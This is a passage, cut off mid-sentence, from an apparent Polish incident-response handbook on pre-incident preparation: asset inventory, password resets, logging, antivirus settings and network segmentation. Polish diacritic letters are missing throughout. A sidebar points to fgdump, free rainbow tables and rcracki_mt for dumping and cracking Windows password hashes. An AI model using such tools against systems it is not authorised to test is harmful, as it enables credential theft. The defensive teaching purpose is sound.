Gdy specjalici ds. bezpieczestwa komputerw zastanawiaj si, jak przygotowa rodowisko
do incydentu, rzadko bior pod uwag zarzdzanie rodkami. Wyobra sobie tak sytuacj:
dowiadujesz si, e haker obra za cel jeden z dziaw Twojej organizacji. Dzia ten zajmuje si
badaniem technologii o fundamentalnym znaczeniu dla nowej usugi, jak firma wiadczy.
Naturalnym odruchem byoby zbadanie systemw z tego dziau, aby sprawdzi, czy nie zostay
zamane ich zabezpieczenia. Ewentualnie mona by zaimplementowa dodatkowe protokoy
bezpieczestwa dla tego dziau. Aby dziaania te byy skuteczne, naley dokadnie wiedzie,
jakie systemy nale do dziau i gdzie s zlokalizowane.
W kontekcie ledztwa mona wyrni kilka wanych kwestii zwizanych z zarzdzaniem
rodkami. Cho wygodniej przechowywa wszystkie informacje w jednym miejscu, wikszo
organizacji przechowuje rne rodzaje danych o systemie w rnych miejscach. Najwaniejsze jest,
aby byo wiadomo, w jaki sposb mona dosta si do informacji, gdy bd potrzebne. Dlatego
naley oceni, jaka jest dostpno nastpujcych informacji o systemach.
Data dostarczenia wyobra sobie, e wykrywasz podejrzan aktywno, ktra miaa
miejsce dwa miesice temu w jednym systemie. Sprawdzasz nazw tego hosta w systemie
zarzdzania rodkami i dowiadujesz si, e jest to serwer, ktry wymieniono w zeszym
tygodniu. Wiesz wic, e aktualny system nie zawiera adnych dowodw zwizanych z tamt
aktywnoci sprzed dwch miesicy. W takim przypadku najlepszym rozwizaniem jest
znalezienie starego serwera, w czym rwnie moe by pomocny system zarzdzania rodkami.
Przynaleno wiele organizacji zleca rne usugi na zewntrz. Jeeli system nie naley
do Twojej organizacji, sposb reakcji na incydent moe by inny. Powinno by jasne, kto
jest wacicielem danego sprztu.
Jednostka biznesowa wiedza, do ktrej jednostki biznesowej w organizacji naley
okrelony system, moe dostarczy ledczym informacji kontekstowych i pomc w podjciu
odpowiednich decyzji. Przykadowo to, e dotknity system jest serwerem baz danych,
moe mie znaczenie, ale nie musi. Jeli jednak dodatkowo wiadomo, e serwer ten naley
do jednostki biznesowej posugujcej si informacjami podlegajcymi regulacjom prawnym,
to sprawa wyglda cakiem inaczej.
Fizyczna lokalizacja jeli trzeba wykona obraz dysku twardego albo inne czynnoci
wymagajce fizycznego dostpu do systemu, oczywicie musimy wiedzie, gdzie go szuka.
Nie twierdzimy, e informacje te musz by bez przerwy aktualizowane, np. w przypadku
laptopw, ale e podstawowa lokalizacja kadego urzdzenia powinna by gdzie zapisana.
Informacje kontaktowe aby mona byo koordynowa proby o dostp do rnych
zasobw, fizycznie korzysta z pewnych urzdze oraz powiadamia akcjonariuszy o wanych
zdarzeniach, naley posiada list kontaktw powizanych z kadym systemem. Najlepiej
aby na licie tej znajdoway si podstawowe i dodatkowe dane do kontaktu. W przypadku
serwerw przydatne s dane administratorw systemowych i aplikacji oraz firmowy punkt
kontaktowy. Jeli chodzi o uytkownikw kocowych, powinno si mie kontakt do
uytkownika gwnego i jego szefa.
Rola usug ledczy musi wiedzie, jak rol dany system peni. Zalecamy dostarczanie
rozsdnej iloci szczegw, np. napis serwer to za mao. Jaki to serwer? Od jego roli
zaley to, jakie dziaania podejmiemy, z kim bdziemy si kontaktowa oraz jak bardzo
bdziemy si spieszy w dochodzeniu. Przykadowo o wiele atwiej wykona obraz dysku
twardego z laptopa ni z napdu SAN o pojemnoci 16 TB podczonego do produkcyjnego
serwera baz danych. Im szybciej si o tym dowiemy, tym lepiej zareagujemy na incydent.
Konfiguracja sieci w konfiguracji sieci naley zarejestrowa nazw hosta, konfiguracj
IP oraz adresy MAC kadego interfejsu. Jeeli adres IP jest przydzielany przez DHCP, nie
powinien by podawany. Jeli jednak jest przypisany statycznie, jego podanie w systemie
zarzdzania rodkami moe by korzystne.
Inwentaryzacja
Standardowa dokumentacja budowy systemu organizacji oraz magazynw oprogramowania i inne
dokumenty rzadko przedstawiaj kompletny obraz infrastruktury informatycznej. W trakcie
ledztwa czsto znajdujemy programy, sprzt i systemy operacyjne, o ktrych nikt w organizacji
wczeniej nie wiedzia. Jako e nie lubimy niespodzianek w rodku dochodzenia, zachcamy do ich
wykrywania zawczasu. Zalecamy przeprowadzenie inwentaryzacji (automatycznie lub w inny sposb)
w celu zdobycia i zweryfikowania poniszych informacji. Naley zapisa nazw producenta, nazw
produktu oraz numer wersji kadego produktu uywanego w organizacji. Oto szczegy tego spisu.
Systemy operacyjne (Windows, Mac OS X, Linux, HP-UX).
Sprzt (laptopy, komputery biurkowe, serwery, urzdzenia przenone).
Technologie sieciowe (przeczniki, bezprzewodowe punkty dostpu, zapory sieciowe, IDS,
serwery proxy).
Schemat sieci.
Oprogramowanie zabezpieczajce (antywirus, HIPS, biaa lista).
Zarzdzanie (atki, konfiguracje, zarzdzanie rodkami, monitorowanie wydajnoci).
Aplikacje uytkowe (edytory tekstu, programy graficzne, programy dla inynierw,
przegldarki internetowe).
Aplikacje biznesowe (do zarzdzania czasem i dokumentami oraz do przetwarzania
patnoci).
Uwaga Ze wzgldu na atw dostpno tczowych tabel, w systemie Windows kady skrt lanman hasa
krtszego ni 15 znakw i kady skrt NTLM hasa krtszego ni 9 znakw naley uwaa za zamany.
Czsto spotykamy si z opiniami, e haker nie bdzie w stanie zama hasa do systemu Windows
w sensownym czasie, ale szybko udowadniamy, e to iluzja, pobierajc zrzut skrtw hase i w cigu
kilku minut pokazujc ich rozszyfrowane wersje (w przypadku NTLM proces zajmuje kilka godzin).
Sam moesz to sprawdzi, korzystajc z narzdzi wymienionych poniej.
Hasa
Masowe zmienianie danych powiadczajcych (np. reset hase) to dla wielu organizacji
wyjtkowo trudne zadanie. W trakcie ledztwa moesz odkry, e haker zama haso do
jednego konta lub wikszej liczby kont. Rozwizaniem takiego problemu jest oczywicie
zmiana odpowiednich danych powiadczajcych. Czsto jednak hakerzy zdobywaj setki,
a nawet tysice hase w postaci zrzutw skrtw z kontrolerw domen Windows. Wrd nich
zwykle znajduj si hasa do kont usugowych ktre zazwyczaj s wpisane na stae do rnych
systemw zaplecza biurowego i aplikacji. Ponadto istniej hasa do aplikacji, np. specjalistycznych
systemw finansowych. I w kocu niektre organizacje wykorzystuj to samo konto administratora
lokalnego we wszystkich systemach. To wszystko w sumie jest dla dziau informatycznego
jednym wielkim koszmarem, chyba e ma gotowy plan wprowadzania zmian u wszystkich
uytkownikw i we wszystkich usugach na raz. Proces ten z reguy planuje si w porozumieniu
z pracownikami pomocy technicznej, ktrzy najprawdopodobniej bd musieli tumaczy,
co si stao, zdezorientowanym klientom. Nie da si przeceni wagi tego kroku. Wystarczy
pomin jeden system lub jedno konto administratora, aby caa praca posza na marne.
W INTERNECIE
Narzdzie do wykonywania zrzutw skrtw hase o nazwie fgdump www.foofus.net/~fizzgig/fgdump
Darmowe tczowe tabele www.freerainbowtables.com
Narzdzie do amania hase przy uyciu tczowych tabel o nazwie rcracki_mt sourceforge.net/projects/rcracki.
Oprzyrzdowanie
Szukajc sposobw na udoskonalenie systemu w taki sposb, aby jak najatwiej prowadzio si
w nim ledztwo, naley uwzgldni dwie pocztkowe fazy, czyli zdobywanie tropw i podanie
tropami. Co mona zarejestrowa, przechwyci lub zapisa w inny sposb, aby jak najbardziej
uatwi ustalenie, co si stao? Pomyl o narzdziach, ktre ju masz mierniki programowe,
monitory wydajnoci oraz program antywirusowy i zapory sieciowe na hostach i zastanw si,
jak ulepszy ich konfiguracj. Nastpnie poszukaj nowych rozwiza, np. narzdzi ledczych.
Czy da si skontaktowa z systemem i otrzyma od niego odpowied na pytania typu:
Czy taki plik istnieje?, Czy figuruje w rejestrze taki a taki kucz?.
Dzienniki zdarze, bdw i dostpu

W prawie kadym ledztwie, jakie prowadzimy, dzienniki stanowi dla nas bezcenne rdo
informacji. Jeli wic chcesz pomc w ewentualnym dochodzeniu, moesz zadba o rejestrowanie
odpowiednich zdarze i przechowywanie ich przez odpowiedni ilo czasu. Centralny system
dziennikw jest jednym z najwaniejszych czynnikw pozwalajcych przeprowadzi skuteczne
ledztwo. Z drugiej strony wypracowanie takiego systemu jest dla organizacji sporym wyzwaniem.
Jak gromadzi dane z dziennikw i gdzie je przechowywa? Jak dugo przetrzymywa dane?
Czy wszystkie systemy znajduj si w tej samej strefie czasowej, co uatwia korelacj zdarze?
Opisujemy tu kilka rozwiza kwestii rejestrowania danych w dziennikach i sposobw konfiguracji
systemu, dziki ktrym moliwe bdzie zachowanie informacji przydatnych w ledztwie.
W organizacji moe ju by wdroone centralne rozwizanie rejestracji danych w dziennikach.
Jeli tak, to wietnie! A jeli nie, zastanw si, jakie nakady byyby potrzebne do jego wdroenia.
Moliwoci jest wiele, od darmowych i otwartych programw, takich jak Splunk, ELSA, Snare
firmy InterSect Alliance oraz NTSyslog, po wysokiej klasy komercyjne pakiety do zabezpieczania
informacji i zarzdzania zdarzeniami (ang. Security Information and Event Management SIEM),
takie jak ArcSight i enVision firmy RSA. Zarzd organizacji musi sam zdecydowa, ktre rozwizanie
w ich przypadku bdzie najlepsze.
Kolejn kwesti wymagajc podjcia decyzji jest sposb przechowywania danych. Oglnie
rzecz biorc, zalecamy przechowywanie dziennikw przez przynajmniej rok. W niektrych
rodowiskach zdarze jest tak duo, e trudno przechowywa informacje o nich duej ni kilka
tygodni. W takich przypadkach naley przejrze dane i wybra z nich te elementy, ktre warto
zachowa duej. Wikszo wama wykrywa si po kilku tygodniach od zdarzenia, cho bywa
tak, e haker pozostaje w systemie niezauwaony miesicami, a nawet latami. Ponadto pamitaj,
e kwestie dotyczce rejestrowania danych mog podlega regulacjom branowym. I tak wytyczne
Data Security Standards v2.0 (DSS) PCI nakazuj przechowywanie przez rok danych wszystkich
rodkw nalecych do rodowiska przetwarzania danych PCI. W innych przypadkach radca
prawny moe nalega na jak najkrtsze przechowywanie danych. Upewnij si, e zalecenie to nie
jest w konflikcie z potencjalnym ryzykiem dla przyszych dochodze.
Na koniec naley jeszcze zdecydowa, jakie informacje maj by rejestrowane w dziennikach.
Powinno si wzi pod uwag dwa gwne rda danych, czyli systemy operacyjne i aplikacje.
Wikszo organizacji, dla ktrych prowadzimy ledztwa, ma le skonfigurowane narzdzia
do obsugi dziennikw danych w systemach operacyjnych i w ogle nie zapisuje informacji
o aplikacjach. Najpierw zajmiemy si systemami operacyjnymi.
Dwa najczciej spotykane systemy operacyjne to Microsoft Windows i Unix lub podobne, np.
Linux. Wiele domylnych instalacji systemu Windows nie ma wczonych odpowiednich narzdzi
inspekcji, ktre mogyby przyda si w ledztwie. Dlatego zalecamy skonfigurowanie przynajmniej
ustawie w podstawowych obrazach systemw wykorzystywanych w organizacji. Polecamy:
wczy rejestrowanie zdarze logowania i wylogowywania oraz zdarze dotyczcych
zarzdzania uytkownikami i grupami;
rejestrowa, jeli to moliwe, zdarzenia tworzenia i zamykania procesw;
zwikszy ilo miejsca dla kadego dziennika zdarze do przynajmniej 100 MB
(najlepiej 500 MB);
przekazywa informacje o wszystkich zdarzeniach do centralnego systemu dziennikw.
W INTERNECIE
Snare dla Windows www.intersectalliance.com/projects/BackLogNT
Systemy uniksowe z reguy rejestruj wicej informacji, ktre mog by przydatne w ledztwie,
ale niektre przechowuj je zbyt krtko. Dlatego w systemie Unix zalecamy sprawdzi nastpujce
ustawienia:
wczy, jeli jest taka moliwo, ewidencjonowanie aktywnoci procesw;
zwikszy ilo miejsca do przechowywania danych;
przekazywa informacje o wszystkich zdarzeniach do centralnego systemu dziennikw.
Jeli chodzi o aplikacje, to najbardziej przydatne w ledztwie s dzienniki z serwera sieciowego,
serwera proxy i zapory sieciowej. Oczywicie to nie wszystkie wane informacje. Dodatkowo warto
mie dzienniki baz danych, poczty e-mail, systemu DNS (zapyta i odpowiedzi), przydziaw
dzierawy DHCP (aby mona byo znale system na podstawie tylko jego adresu IP), zapory
sieciowej, programu antywirusowego, IPS/IDS oraz wasne dzienniki aplikacji. Powinno si
przeanalizowa kady proces biznesowy i kad usug w organizacji, aby wiedzie, gdzie s
przechowywane dzienniki i czy da si utworzy dla nich centralny magazyn. Czasami rejestracja
danych w dziennikach jest cakiem wyczona, np. czsto zapomina si o zapisywaniu zapyta DNS.
Programy antywirusowe i systemy zapobiegania wamaniom do hostw

Istnieje wiele programw antywirusowych i systemw zapobiegania wamaniom (ang. Host
Intrusion Prevention System HIPS). Wszystkie one cigle si zmieniaj, wic nie ma sensu
opisywa tu konkretnych rozwiza. Z perspektywy ewentualnej reakcji na incydent najwaniejsze
jest to, jak s skonfigurowane i jakiego rodzaju informacje mog zapewni na potrzeby ledztwa.
Wyjanimy dokadnie, o co nam chodzi, na przykadzie dwch scenariuszy.
W prawie kadej organizacji uywany jest jaki program antywirusowy lub system HIPS.
Widzielimy wszystkie narzdzia, od darmowych produktw po drogie rozwizania przernych
producentw. Nie bdziemy zagbia si w kwestie zwizane ze skutecznoci tych rozwiza,
poniewa najbardziej interesuje nas to, jak kontrol ma uytkownik nad sytuacj, gdy wykryje
co niepokojcego. Jeeli np. program nie rejestruje zdarze na centralnym serwerze, nie da si
przejrze odkry w caej organizacji. Ponadto wykorzystywane w Twojej organizacji rozwizanie
moe usuwa szkodliwe oprogramowanie od razu po jego wykryciu. Cho moe si to wydawa
dobrym pomysem, w ten sposb niszczy si dowody. Lepiej podejrzane pliki przenosi do
kwarantanny w centralnej lokalizacji, aby mona byo je przeanalizowa, wygenerowa na ich
podstawie wskaniki zagroenia oraz znale adres IP, z ktrym si komunikoway.
Inn wan kwesti jest wysyanie szkodliwego oprogramowania do producenta programu
antywirusowego. Niektre programy automatycznie wysyaj podejrzane pliki binarne do bazy
w celu umoliwienia ich analizy przez specjalistw. W takiej sytuacji przestajesz w peni panowa
nad sytuacj. Szkodliwe oprogramowanie spreparowane specjalnie pod ktem Twojej organizacji
moe zawiera informacje o rodowisku np. ustawienia proxy, a nawet dane powiadczajce.
Ponadto programy takie mog zawiera informacje ujawniajce rodzaj ataku. I w kocu producent
antywirusa moe przesa Ci aktualizacj sygnatur wirusw, przez co wykryty szkodliwy program
bdzie usuwany, zanim si na to przygotujesz to moe wydawa si dziwne, ale szczegowo
wszystko wyjaniamy w rozdziale 15. Zachowaj ostrono przy wysyaniu szkodliwych
programw do analizy w portalach analitycznych. Wikszo z nich ma umowy z najwaniejszymi

producentami programw antywirusowych, ktrzy natychmiast otrzymuj wszystkie prbki.
Krtko mwic, programy antywirusowe i systemy HIPS naley tak skonfigurowa, aby pomagay
w ewentualnym ledztwie, a nie przeszkadzay w jego prowadzeniu. Powinny zapewnia centralny
magazyn informacji oraz umoliwia przeszukiwanie zdarze, przechwyconych plikw i innych
przydatnych rodzajw treci. Ponadto powinno da si ustawia ich sposb reakcji na wykrycie
potencjalnych zagroe.
Narzdzia ledcze
Moliwo sigania do systemw w rodowisku i zadawania im pyta zwizanych z tropami
podjtymi w ledztwie jest niezwykle wana. Gdy odkryjesz co niezwykego, np. szkodliwy
program, narzdzia hakerskie itp., to nastpnym pytaniem powinno by: W jakich jeszcze
systemach w moim rodowisku znajduje si to co?. Precyzyjna odpowied na to pytanie pomoe
Ci okreli zasig incydentu.
Najlepiej, gdy organizacja dodaje narzdzia ledcze do standardowej budowy wszystkich
systemw: serwerw, laptopw i komputerw biurkowych. Na rynku dostpnych jest kilka
rozwiza, np. AccessData Enterprise, Guidance Software EnCase Enterprise oraz Mandiant
Intelligent Response. Ponadto mona tworzy wasne rozwizania przy uyciu standardowych
narzdzi do administracji systemami i programistycznych, takich jak skrypty powoki i WMI
(ang. Windows Management Instrumentation). Aby znale odpowiednie dla siebie rozwizanie,
naley rozejrze si na rynku.
Dodatkowe czynnoci pozwalajce zwikszy poziom bezpieczestwa

W tym podpunkcie przedstawiamy list czynnoci, jakie mona wykona, aby zwikszy oglny
poziom bezpieczestwa indywidualnych systemw. Jest spora szansa, e przy okazji dziaania te
uatwi ewentualne przysze ledztwo. Poniewa jednak nie s one bezporednio zwizane
z przygotowywaniem si do incydentu, nie opisujemy ich szczegowo.
Ustal sposb instalowania poprawek do systemw operacyjnych i aplikacji.
Rozwa moliwo stosowania uwierzytelniania dwuskadnikowego i wymu uywanie
odpowiednio skomplikowanych hase.
Odbierz uytkownikom lokalne uprawnienia administracyjne.
W kadym systemie zainstaluj i odpowiednio skonfiguruj program antywirusowy
i zapor sieciow.
Likwiduj systemy, ktre s ju nieuywane.
Korzystaj z systemu zarzdzania konfiguracjami.
Zdefiniuj bia list aplikacji.
Zadbaj o zgodno z wytycznymi STIG DISA: iase.disa.mil/stigs.
Stosuj si do wytycznych NSA IA dotyczcych agodzenia skutkw incydentw:
www.nsa.gov/ia/mitigation_guidance/index.shtml.
Konfiguracja sieci
Wiesz ju, jak postpowa z pierwszym z wyrnionych przez nas obszarw urzdzeniami
komputerowymi wic moemy przej do drugiego, ktrym jest konfiguracja sieci. Istnieje
wiele poradnikw i innych publikacji na temat projektowania bezpiecznych sieci. Nie opisujemy
wszystkich zwizanych z tym kwestii, a jedynie najczciej stosowane techniki, ktre mog
znacznie pomc zespoowi RI w ledztwie. Dla przypomnienia poniej jeszcze raz przedstawiamy
list tematw, ktre omawiamy w tym podrozdziale; s to:
segmentacja sieci i kontrola dostpu,
dokumentacja,
instrumentacja,
usugi sieciowe.
Jako materiau pomocniczego do objanie prezentowanych w tym punkcie uywamy poniszego
schematu fikcyjnej organizacji. Zawiera on rozwizania, ktrych wdroenie w istniejcej sieci
mogoby by trudne, ale niektrzy nasi klienci opieraj swoje zabezpieczenia i akcje przeciw
incydentom na takich projektach.
Na rysunku 3.1 pokazalimy przykad dobrze skonstruowanej sieci segmentowej. Nasza prosta
fikcyjna firma ma cztery jednostki podrzdne: Finanse, Inynieri, Sprzeda oraz Pomoc IT. Kada
z tych jednostek ma dostp do wasnego zbioru zasobw (serwerw) i zasobw korporacyjnych
w strefie usug wewntrznych. Pozorny brak poczenia midzy jednostkami i zapr sieciowych
moe wydawa si dziwny, ale wszystko wyjaniamy dalej.
W INTERNECIE
Centrum informacji o bezpieczestwie komputerowym NIST csrc.nist.gov
ISO 27001 Security iso27001security.com
Zeznania naocznego wiadka
Tylko nieliczne organizacje ciesz si luksusem, jakim jest moliwo dokonania cakowitego
resetu i zaprojektowanie caej sieci od nowa. Nawet wtedy, gdy maa firma startuje z dobrze
zaprojektowanym planem, w procesie wzrostu, pocze i przej powstaj komplikacje, ktre
rwnie wymagaj dokadnego planowania. Wikszo naszych klientw dochodzi do wniosku,
e po incydencie wszystko jest moliwe i kierownictwo czsto wspiera pomysy wprowadzenia
powanych zmian w infrastrukturze sieci. Jako e nie ma tego zego, co by na dobre nie wyszo,
wikszo organizacji po incydencie znajduje si w lepszej kondycji ni przed nim. A te, ktre
nic nie poprawi, z reguy po kilku tygodniach borykaj si z kolejn infekcj.
RYSUNEK 3.1. Schemat sieci przedsibiorstwa
Segmentacja sieci i kontrola dostpu

Jedn z powszechnie stosowanych metod zabezpieczeniowych jest segmentacja sieci na podstawie
informacji przetwarzanych przez segmenty lub role systemw albo ich uytkownikw.
Kontrolowanie ruchu przechodzcego midzy segmentami sieci umoliwia organizacji
monitorowanie i ochron znaczcych zasobw oraz procesw komunikacji. Podczas ledztwa
kontrola ta moe by bardzo pomocna przy identyfikowaniu i ograniczaniu zagroenia
w dotknitych nim systemach.
Na schemacie przedstawionym na rysunku 3.1 wydzielilimy segmenty reprezentujce
poszczeglne jednostki organizacyjne oraz zastosowalimy filtry przepuszczajce tylko ruch
niezbdny do prowadzenia dziaalnoci biznesowej. I tak systemy w strefie Finanse dysponuj
zestawem serwerw, na ktrych dziaa aplikacja ksigowa ERP. Informacje przetwarzane przez
te serwery s cile tajne, poniewa ich wyciek moe negatywnie wpyn na kondycj finansow
firmy oraz narazi klientw i dostawcw na straty. cisa kontrola wymaga ograniczenia ruchu
zarwno lokalnego (wewntrz strefy), jak i zdalnego (z innych jednostek organizacyjnych)
do niezbdnego minimum oraz uwierzytelniania (wczeniej podkrelilimy, jak wane jest
uwierzytelnianie dwuskadnikowe na kontach z podwyszonymi uprawnieniami i w przypadku
dostpu do poufnych danych). Analogicznie wyglda sytuacja dziau Inynierii, ktry rwnie
ma wasne zasoby serwerowe; musz by one odseparowane od reszty jednostek organizacyjnych,
a szczeglnie od dziau Sprzeda.
Trudno przedstawi na jednym schemacie sieci du liczb mechanizmw kontroli dostpu.
Na tym poziomie brakuje trzech, ktre uchodz za nieodzowne.
Filtrowanie ruchu na poziomie jednostki organizacyjnej filtry danych przychodzcych
i czsto ignorowane filtry danych wychodzcych s absolutnie niezbdne, jeli chcemy
utrudni hakerowi poruszanie si po caym przedsibiorstwie. Zastanw si, jakie zasoby s
rzeczywicie potrzebne, za blokad oraz wcz kontrol zmian i przeprowadzaj okresowe
inspekcje, aby zapewni spjno danych przez cay czas.
Internet, chaty i serwery proxy do przesyania plikw ruch wychodzcy do zasobw
zewntrznych powinien przechodzi przez serwery proxy monitorujce i filtrujce
przechodzce przez nie dane. Jest to wana cz linii ochrony, dziki ktrej na zewntrz
mog wychodzi tylko dozwolone informacje. Dodatkow korzyci jest to, e wikszo
serwerw proxy przy okazji peni rol serwerw buforowych, zmniejszajc wymagania
dotyczce przepustowoci. Jeli serwer proxy rejestruje komunikacj, inspektorzy nadzoru
i prawnicy rwnie na tym skorzystaj.
Dwuskadnikowe uwierzytelnianie dla pocze przekraczajcych wane granice
w wikszoci organizacji wiadomo, e cay ruch VPN pochodzcy z internetu naley
kontrolowa za pomoc uwierzytelniania dwuskadnikowego. Niestety tylko nieliczne
jednostki stosuj takie ograniczenia w odniesieniu do zasobw wewntrznych. Serwery,
stacje administracyjne i stacje wstpne (ang. jump box) rwnie powinny by zabezpieczone
w ten sposb. Stacje wstpne szerzej omawiamy dalej.
Uwaga Uwaaj na zbyt lune zestawy regu protokow Microsoft RPC. Wiele organizacji tworzy w swoich
wewntrznych zaporach sieciowych alias zawierajcy standardowe porty Windows. Aby wszystko
dziaao, otwiera si porty 135, 137, 138, 139, 445 i kilka innych oraz definiuje to jako generaln
zasad, przez co poziom zabezpiecze spada do minimum. Pamitaj, e jeli zezwolisz na zwyke
udostpnianie plikw, przy okazji otrzymasz uprawnienia do zdalnej administracji (psexec) tymi
portami. le skonstruowana architektura RPC sprawia, e udzielenie dostpu do udziau plikowego
nie ogranicza si tylko do punktu instalacji, przez co hakerzy mog bez przeszkd penetrowa
segmentow sie.
Na schemacie 3.2 przedstawilimy szczegowo struktur dziau finansowego. Na rysunku tym

ukazana jest konfiguracja systemu ERP (planowania zasobw przedsibiorstwa) w chronionej
enklawie w strefie finansowej. Enklawa ta (Serwery finansowe) przepuszcza tylko ruch,
ktry jest niezbdny do wiadczenia usug przez jednostk. Podobnie jest z ruchem wychodzcym
i grup finansow, ktre rwnie podlegaj cisej kontroli. Niektre szczegy pominlimy dla
uproszczenia (np. uwierzytelnianie ruchu z enklawy do korporacyjnego serwera z uwierzytelnianiem
dwuskadnikowym). Pionowa linia biegnca w d od przecznika wielowarstwowego reprezentuje
wyrany rozdzia dwch sieci. Rozdzia taki mona osign przy uyciu sieci VLAN i przez
zastosowanie filtrowania w jednym urzdzeniu lub przez wykorzystanie kilku przecznikw.
Rysunek 3.2 przedstawia trzy elementy sterowania sieci ograniczajce dostp do danych
i umoliwiajce gromadzenie informacji w przypadku wamania; s to segregacja sieci,
ograniczenie dostpu do funkcji administracyjnych oraz centralne monitoringi.
RYSUNEK 3.2. Schemat sieci dziau finansowego

Kontrola dostpu
W opisie poprzedniego schematu stwierdzilimy, e ruch midzy strefami jest cile kontrolowany.
Pracownicy finansowi maj ograniczony dostp do sieci zewntrznych. Za ruch dozwolony
uwaany jest ruch uwierzytelniajcy do serwerw LDAP i Active Directory, IMAP i inne rodzaje
ruchu do korporacyjnych serwerw poczty oraz ruch sieciowy do korporacyjnych serwerw proxy
i innych wewntrznych miejsc. Ponadto pracownicy z tego dziau maj ograniczony dostp do
serwerw znajdujcych si w ich dziale. W tym przykadzie caa komunikacja z systemem ERP
jest obsugiwana przez protok HTTPS i filtry zezwalaj tylko na taki ruch. Ruch przychodzcy
(nieukazany) jest ograniczony do serwerw zarzdzania systemem obsugiwanych przez dzia IT.
W strefie serwerowej dziau finansw ruch podlega podobnym ograniczeniom. Reguy
dotyczce ruchu wychodzcego przypominaj reguy zdefiniowane dla uytkownikw ze strefy
finansowej, tylko maj konkretnie okrelone cele. Zauwa jednak, e z serwerw niedopuszczalny
jest ruch wyjciowy, chyba e wymagaj tego okrelone aplikacje. Reguy dotyczce ruchu
wejciowego pozwalaj na oglny dostp pracownikw do serwerw sieciowych wykorzystywanych
do wprowadzania informacji czasowych i ksigowych. Natomiast dostp przez administratorw
systemu jest ograniczony w inny sposb. W tym przykadzie administracyjna stacja robocza
(wymagajca uwierzytelniania dwuskadnikowego) jest jedynym wzem, przez ktry mona wej
do rodowiska w celu wykonywania czynnoci administracyjnych. Jeli administrator systemu
chce przeprowadzi jakie dziaania na serwerze baz danych, najpierw musi zalogowa si do
interaktywnej sesji na administracyjnej stacji roboczej (jest to tzw. serwer wstpny, ang. jump box),
a nastpnie poczy si z serwerem baz danych dziau finansowego. To znacznie uatwia tworzenie
filtrw i prowadzenie inspekcji, poniewa rdem ruchu przychodzcego i wychodzcego moe
by minimalna liczba systemw i portw. Cho nigdy nie ufamy zbytnio punktom kocowym,
take na hostach zastosowano zapory sieciowe jako skadnik dogbnego systemu zabezpiecze.
W kocu zesp RI moe atwo monitorowa cay ruch kontrolowany przez pojedyncz
jednostk filtrujc przypisan do grupy finansowej. Najczciej najpierw czujniki umieszcza si
na krawdzi sieci korporacyjnej w celu gromadzenia ruchu do analizy i podnoszenia alarmu,
gdy zostan znalezione znane sygnatury. Gdy zesp w wystarczajcym stopniu zaznajomi si
z monitoringiem, moe rozszerzy jego zakres na ruch wewntrz dziau, aby wykry ruch poziomy
w strukturze przedsibiorstwa.
Uwaga Podczas projektowania i analizy segmentw sieci oraz filtrw zawsze naley uwzgldnia skutki
potencjalnego zamania systemu lub danych powiadczajcych. Niestety zawsze tam, gdzie
zaangaowani s ludzie, mona zakada, e jakie funkcje kontrolne zawiod. Doskonaym
wiczeniem przy planowaniu jest wykonanie analizy drzewa bdw dla kilku powanych niepodanych
zdarze. Zminimalizuj liczb warunkw LUB na grnych poziomach i skoncentruj swoje wysiki na
pozostaych zagroeniach. Ten rodzaj analizy ma zastosowanie take w nastpnym podpunkcie
dotyczcym oprzyrzdowania, poniewa zagroenia czsto mona monitorowa.
Ograniczanie komunikacji midzy stacjami roboczymi

Kolejnym technik, ktrej nie przedstawilimy na rysunkach, jest filtrowanie ruchu w punktach kocowych.
Niezalenie od systemu operacyjnego, nigdy nie ufaj zanadto bezpieczestwu punktw kocowych.
Zapory sieciowe na hostach mona bardzo atwo zmodyfikowa po zdobyciu uprawnie systemowych.
W fazie naprawczej akcji RI jeden z naszych klientw ograniczy cay ruch stacji roboczej tylko
do okrelonych serwerw i bram. Stacje robocze uytkownikw straciy prawo do bezporedniej
komunikacji ze stacjami roboczymi innych uytkownikw. W cigu kilku miesicy paru uytkownikw
pado ofiar phishingu. Jednak mimo zamania zabezpiecze i wykradzenia danych powiadczajcych
do kilku systemw infekcja nie rozprzestrzenia si. Dziki odizolowaniu stacji roboczych i ochronie
domenowych danych powiadczajcych incydenty stay si tylko lokalnymi problemami.
Ponadto elementy RPC modelu sieciowego firmy Microsoft uniemoliwiaj ograniczanie dostpu
na poziomie usug dla urzdze brzegowych i przecznikw. Jeli istnieje taka moliwo, wycz
ruch midzy portami w kontrolowanych przez siebie przecznikach, chyba e porty te maj
poczenie ze wsplnymi zasobami lub innym przecznikiem. To, czy ten rodzaj filtrowania
jest atwy do wdroenia, zaley od technologii wykorzystywanych w przedsibiorstwie.
Kilku naszych klientw stosowao ciekaw metod kontrolowania i monitorowania ruchu w swoich
sieciach. Pokazalimy to na naszym oglnymi schemacie sieci. Z wyjtkiem serwerw proxy, zapr
sieciowych i routerw granicznych adne urzdzenie przeczajce nie ma skonfigurowanej domylnej
trasy wejciowej. Wszystkie stacje robocze wymagajce dostpu do zasobw zewntrznych s kierowane
do serwerw proxy wymagajcych uwierzytelnienia. Ruch skierowany do zewntrznych adresw IP
moe by przesyany do czarnej dziury lub systemu analitycznego. Niektre organizacje wykorzystuj
to jako system wczesnego ostrzegania przed prostym szkodliwym oprogramowaniem.
Naley podkreli, e mimo i wiele nowych szkodliwych programw ma wiadomo istnienia
serwerw proxy i niektre poprawnie wykonuj uwierzytelnienie, przekazywanie ruchu przez
takie serwery umoliwia organizacji analizowanie ruchu opuszczajcego sie. Dzienniki z serwerw
proxy mog zawiera dane, na podstawie ktrych zesp RI dowie si, czy wystpoway zapytania
speniajce pewne kryteria oraz jaki ruch one wygeneroway. Monitorujc dozwolone i nieoczekiwane
prby pocze, gromadzi si porednie i bezporednie dowody incydentu.
Uwaga Czsto syszymy pytanie: Czy powinnimy skonfigurowa honeypot, aby utrudni prac hakerom?.
Puapki honeypot su do dwch celw. Po pierwsze, zabieraj hakerowi czas i zasoby, prezentujc
mu mao znaczce dla organizacji systemy i dane. Z reguy jest to mao efektywne. Jeli hakerowi
zostan podsunite informacje, do ktrych dostp jest atwiejszy ni do wanych danych, zostanie
on odcignity od sedna na czas wypicia filianki kawy. Jeli zbudujesz zaawansowan puapk,
ktrej sforsowanie przysporzy hakerowi problemw, stracisz duo czasu, ktry lepiej byoby powici
na chronienie prawdziwych rodkw. Po drugie, puapki honeypot s wykorzystywane jako narzdzia
do wykrywania metod stosowanych przez aktywnych i potencjalnych intruzw. Z punktu widzenia
ledztwa i podczas trwania incydentu caa sie peni tak rol.
Jeli nie jeste w trakcie prowadzenia ledztwa, standardowe testy penetracyjne nie daj
